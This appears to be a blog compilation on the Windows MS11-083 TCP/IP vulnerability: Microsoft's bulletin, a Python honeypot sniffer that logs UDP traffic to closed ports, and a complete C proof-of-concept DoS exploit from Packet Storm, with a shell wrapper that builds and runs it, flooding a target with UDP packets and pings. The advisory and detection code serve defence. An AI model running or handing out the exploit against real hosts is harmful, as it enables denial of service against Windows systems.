Microsoft Security Bulletin MS11-083 - Critical
Vulnerability in TCP/IP Could Allow Remote Code Execution (2588516)
Executive Summary
This
security update resolves a privately reported vulnerability in
Microsoft Windows. The vulnerability could allow remote code execution
if an attacker sends a continuous flow of specially crafted UDP packets
to a closed port on a target system.
The
security update addresses the vulnerability by modifying the way that
the Windows TCP/IP stack keeps track of UDP packets within memory. For
more information about the vulnerability, see the Frequently Asked
Questions (FAQ) subsection for the specific vulnerability entry under
the next section, Vulnerability Information.
Recommendation. The
majority of customers have automatic updating enabled and will not need
to take any action because this security update will be downloaded and
installed automatically. Customers who have not enabled automatic
updating need to check for updates and install this update manually. For
information about specific configuration options in automatic updating,
see Microsoft Knowledge Base Article 294871.
For
administrators and enterprise installations, or end users who want to
install this security update manually, Microsoft recommends that
customers apply the update immediately using update management software,
or by checking for updates using the Microsoft Update service.
See also the section, Detection and Deployment Tools and Guidance, later in this bulletin.
Known Issues. None
Affected and Non-Affected Software
The
following software have been tested to determine which versions or
editions are affected. Other versions or editions are either past their
support life cycle or are not affected. To determine the support life
cycle for your software version or edition, visit Microsoft Support Lifecycle.
Affected Software
*Server Core installation affected.
This update applies, with the same severity rating, to supported
editions of Windows Server 2008 or Windows Server 2008 R2 as indicated,
whether or not installed using the Server Core installation option. For
more information on this installation option, see the TechNet articles, Managing a Server Core Installation and Servicing a Server Core Installation.
Note that the Server Core installation option does not apply to certain
editions of Windows Server 2008 and Windows Server 2008 R2; see Compare Server Core Installation Options.
Non-Affected Software
| Operating System |
|---|
| Windows XP Service Pack 3 |
| Windows XP Professional x64 Edition Service Pack 2 |
| Windows Server 2003 Service Pack 2 |
| Windows Server 2003 x64 Edition Service Pack 2 |
| Windows Server 2003 with SP2 for Itanium-based Systems |
Frequently Asked Questions (FAQ) Related to This Security Update
Severity Ratings and Vulnerability Identifiers
The
following severity ratings assume the potential maximum impact of the
vulnerability. For information regarding the likelihood, within 30 days
of this security bulletin's release, of the exploitability of the
vulnerability in relation to its severity rating and security impact,
please see the Exploitability Index in the November bulletin summary. For more information, see Microsoft Exploitability Index.
Vulnerability Severity Rating and Maximum Security Impact by Affected Software
| Affected Software | Reference Counter Overflow Vulnerability - CVE-2011-2013 | Aggregate Severity Rating |
|---|
| Windows Vista Service Pack 2 | Critical
Remote Code Execution | Critical |
| Windows Vista x64 Edition Service Pack 2 | Critical
Remote Code Execution | Critical |
| Windows Server 2008 for 32-bit Systems Service Pack 2* | Critical
Remote Code Execution | Critical |
| Windows Server 2008 for x64-based Systems Service Pack 2* | Critical
Remote Code Execution | Critical |
| Windows Server 2008 for Itanium-based Systems Service Pack 2 | Critical
Remote Code Execution | Critical |
| Windows 7 for 32-bit Systems and Windows 7 for 32-bit Systems Service Pack 1 | Critical
Remote Code Execution | Critical |
| Windows 7 for x64-based Systems and Windows 7 for x64-based Systems Service Pack 1 | Critical
Remote Code Execution | Critical |
| Windows Server 2008 R2 for x64-based Systems and Windows Server 2008 R2 for x64-based Systems Service Pack 1* | Critical
Remote Code Execution | Critical |
| Windows Server 2008 R2 for Itanium-based Systems and Windows Server 2008 R2 for Itanium-based Systems Service Pack 1 | Critical
Remote Code Execution | Critical |
Detection and Deployment Guidance
Microsoft
provides detection and deployment guidance for security updates. This
guidance contains recommendations and information that can help IT
professionals understand how to use various tools for detection and
deployment of security updates. For more information, see Microsoft Knowledge Base Article 961747.
Microsoft Baseline Security Analyzer
Microsoft
Baseline Security Analyzer (MBSA) allows administrators to scan local
and remote systems for missing security updates as well as common
security misconfigurations. For more information about MBSA, visit Microsoft Baseline Security Analyzer.
The following table provides the MBSA detection summary for this security update.
| Software | MBSA |
|---|
| Windows Vista Service Pack 2 | Yes |
| Windows Vista x64 Edition Service Pack 2 | Yes |
| Windows Server 2008 for 32-bit Systems Service Pack 2 | Yes |
| Windows Server 2008 for x64-based Systems Service Pack 2 | Yes |
| Windows Server 2008 for Itanium-based Systems Service Pack 2 | Yes |
| Windows 7 for 32-bit Systems and Windows 7 for 32-bit Systems Service Pack 1 | Yes |
| Windows 7 for x64-based Systems and Windows 7 for x64-based Systems Service Pack 1 | Yes |
| Windows Server 2008 R2 for x64-based Systems and Windows Server 2008 R2 for x64-based Systems Service Pack 1 | Yes |
| Windows Server 2008 R2 for Itanium-based Systems and Windows Server 2008 R2 for Itanium-based Systems Service Pack 1 | Yes |
Note
For customers using legacy software not supported by the latest release
of MBSA, Microsoft Update, and Windows Server Update Services, please
visit Microsoft Baseline Security Analyzer and reference the Legacy Product Support section on how to create comprehensive security update detection with legacy tools.
Update Compatibility Evaluator and Application Compatibility Toolkit
Updates
often write to the same files and registry settings required for your
applications to run. This can trigger incompatibilities and increase the
time it takes to deploy security updates. You can streamline testing
and validating Windows updates against installed applications with the Update Compatibility Evaluator components included with Application Compatibility Toolkit.
The
Application Compatibility Toolkit (ACT) contains the necessary tools
and documentation to evaluate and mitigate application compatibility
issues before deploying Microsoft Windows Vista, a Windows Update, a
Microsoft Security Update, or a new version of Windows Internet Explorer
in your environment.
Source: https://technet.microsoft.com/en-us/security/bulletin/ms11-083
Honeypot For MS11-083
MS11-083
has arrived and people are getting both excited and scared, it looks
like its going to be the next MS08-067. Which if you remember, Conficker
used to bend windows over and have a jol. Time for a honeypot?
In any case I took a moment and decided to write a script that would
capture potential MS11-083 traffic in an attempt to capture this exploit
in the wild (once its out there, might as well start looking).
According to the security bulletin “The vulnerability could allow remote
code execution if an attacker sends a continuous flow of specially
crafted UDP packets to a closed port on a target system”. So that’s
exactly what I looked at, I used netstat -un and -lun to find all open
and listening ports and filtered them out. UDP packets to a closed port
normally results in a ICMP Port Unreachable response or no response at
all, so I’ve ignored them.
The code is commented and you need the little bash script in the same
folder to get the ports. Remember to make it executable (sudo chmod +x
getports.sh) and run ms11-083_sniffer.py as root. It will create a pcap
file named the <current datetime.pcap> and any UDP traffic heading
towards a closed port will be logged.
Once you have some pcaps and you think they might contain exploit
traffic remember that sharing is caring and karma is a bitch, don’t
share if it was just Chuck Testa. My code is dirty and I wrote it
quickly so don’t hate, feel free to modify and make it better.
I’ll try and add my nmap enumeration script tomorrow, it does a
portscan and OS fingerprint on a given host and inserts that data into a
sqlitedb. That way you can check if the traffic was coming from a
windows host.
ms11-083_sniffer.py
getports.sh
With the bash script, just remove the .txt file extension (my hosting
is being annoying). Below is the code if you want to have a peek.
from pcapy import *
from impacket import ImpactDecoder, ImpactPacket
from socket import *
import fcntl
import struct
import os
import time
class Sniffer:
def __init__(self):
self.promiscuous = True
self.called = 0 #silly habits
self.interface = 'eth0'
self.max_bytes = 65535 # Theoretical max size for a UDP packet
self.read_timeout = 100
self.ip = self.get_ip_address(self.interface)
self.bpf = 'ip dst host %s and not src net 192.168.1.0/30'%self.ip
print "\n---------------------------------------------------"
print "Sniffing for unsolicited UDP packets to closed ports."
print " \"Open ports are for losers\" - MS11-083"
print "Pcap log started, listening from %s"%time.strftime("%d:%m:%Y %H:%M:%S", time.localtime())
print "---------------------------------------------------"
def get_ip_address(self, ifname):
s = socket(AF_INET, SOCK_STREAM)
return inet_ntoa(fcntl.ioctl(s.fileno(), 0x8915, struct.pack('256s', ifname[:15]))[20:24])
def start(self):
self.reader = open_live(self.interface, self.max_bytes, self.promiscuous, self.read_timeout)
# Pcapy uses BPF to filter packets, not src net 192.168.1.0/30
# should be changed, it just filters out 1.0, 1.1, 1.2 and 1.3
# which I use for diffrent gateways and dont want traffic
# from the router hitting the logs.
self.reader.setfilter(self.bpf)
# Run the packet capture loop
self.reader.loop(0, self.callback)
def callonce(self):
self.dumper = self.reader.dump_open(time.strftime("%d-%m-%Y_%H-%M-%S.pcap", time.localtime()))
self.called = 1
def callback(self, hdr, data):
# Parse the Ethernet packet
decoder = ImpactDecoder.EthDecoder()
ether = decoder.decode(data)
# Parse the IP packet inside the Ethernet packet, typep
iphdr = ether.child()
udphdr = iphdr.child()
# First check that the packets are not comming from the local host
# Then check that it is a UDP packet (incase you changed the BPF) also
# Check that the destination port for the packet is a closed port on the host
if (iphdr.get_ip_src() != self.ip):
self.refresh_portlist()
if (iphdr.get_ip_p() == ImpactPacket.UDP.protocol and udphdr.get_uh_dport() not in self.portlist):
if self.called == 0:
self.callonce()
print "Incoming UDP packet from %s"%iphdr.get_ip_src()
self.dumper.dump(hdr, data)
def refresh_portlist(self):
# bash script to get all the open and listening UDP ports
# used in the callback function as criteria for logging traffic
output = os.popen("./getports.sh")
pl = output.readlines()
self.portlist = []
for p in pl:
self.portlist.append(int(p))
def main():
snf = Sniffer()
snf.start()
if __name__ == "__main__":
main()
Source: http://www.securityaegis.com/honey-potting-for-ms11-083/
PoC Code From packetstormsecurity.org
#!/bin/sh
cat >> winnuke2011.c << EOF
/*
* MS11-083 DoS/PoC exploit
* ========================
* This attempts to trigger the ICMP refCount overflow
* in TCP/IP stack of Win7/Vista/Win2k8 hosts. This
* requires sending 2^32 UDP packets to a host on a closed
* port, or 4,294,967,296 packets. A dereference function
* must be called that is not triggered via UDP but ICMP
* echo packets. This exploit creates 250 threads and
* floods a host with UDP packets and then attempts to
* trigger the de-ref using ping. I calculated that it
* would take approximately 52 days for the host to
* enter a condition where this vulnerability is
* triggerable.
*
* -- prdelka
*/
#include <stdio.h>
#include <stdlib.h>
#include <pthread.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <netdb.h>
#include <stdio.h>
#include <unistd.h>
#include <string.h>
#include <sys/time.h>
int port;
int active = 0;
pthread_mutex_t mutexactive;
void *sendpackets(void *ptr);
int main(int argc, char *argv[]) {
pthread_t thread;
int iret,lthreads;
pid_t pid;
printf("[+] MS11-083 DoS/PoC exploit\n");
if(argc<3){
printf("[!] Usage : %s <server> <port>\n", argv[0]);
exit(1);
}
char *const args[] = {"ping",argv[1],NULL};
char *const envp[] = {"",NULL};
port = atoi(argv[2]);
for(lthreads=0;lthreads<250;lthreads++){//UDP flood
iret = pthread_create(&thread,NULL,sendpackets,argv[1]);
printf("[-] Thread number %d started\n",lthreads);
sleep(1);
}
printf("[-] One does not simply barrel roll into Mordor\n");
pid = fork();
if(pid==0){// trigger deref.
execve("./ping.sh",args,envp);
};
while(active){
}
printf("[-] You are finished. Patience is a virtue.\n");
exit(0);
}
void *sendpackets(void *ptr)
{
int sd, rc, n, echoLen, flags, error, timeOut;
unsigned long i;
struct sockaddr_in remoteServAddr;
struct hostent *h;
char str[41];
pthread_mutex_lock(&mutexactive);
active++;
pthread_mutex_unlock(&mutexactive);
srand(time(NULL));
for (i = 0;i < 40;++i){
str[i] = (char)((rand() % 78) + 30);
}
str[40] = '\0'; // yes this was off-by-one. :(
printf("[-] Sending payload '%s'\n",str);
h = gethostbyname(ptr);
if(h==NULL) {
printf("unknown host '%s' \n",(char*)ptr);
exit(1);
}
remoteServAddr.sin_family = h->h_addrtype;
memcpy((char *) &remoteServAddr.sin_addr.s_addr,h->h_addr_list[0], h->h_length);
remoteServAddr.sin_port = htons(port);
sd = socket(AF_INET,SOCK_DGRAM,0);
if(sd<0){
printf("[!] Cannot open socket\n");
pthread_exit((void*)0);
}
flags = 0;
for(i=0;i<4294967295;i++){
rc = sendto(sd,str,strlen(str)+1,flags,(struct sockaddr *)&remoteServAddr,sizeof(remoteServAddr));
if(rc<0){
printf("[!] Cannot send data\n");
close(sd);
pthread_exit((void*)0);
}
}
pthread_mutex_lock(&mutexactive);
active--;
pthread_mutex_unlock(&mutexactive);
pthread_exit(NULL);
}
EOF
cat >> ping.sh << EOF
#!/bin/sh
while \`true\`;do /sbin/ping -c 1 \$1;done
EOF
chmod +x ping.sh
gcc winnuke2011.c -o winnuke2011
./winnuke2011
Source: http://packetstormsecurity.org/files/106873
If you like my blog, Please Donate Me
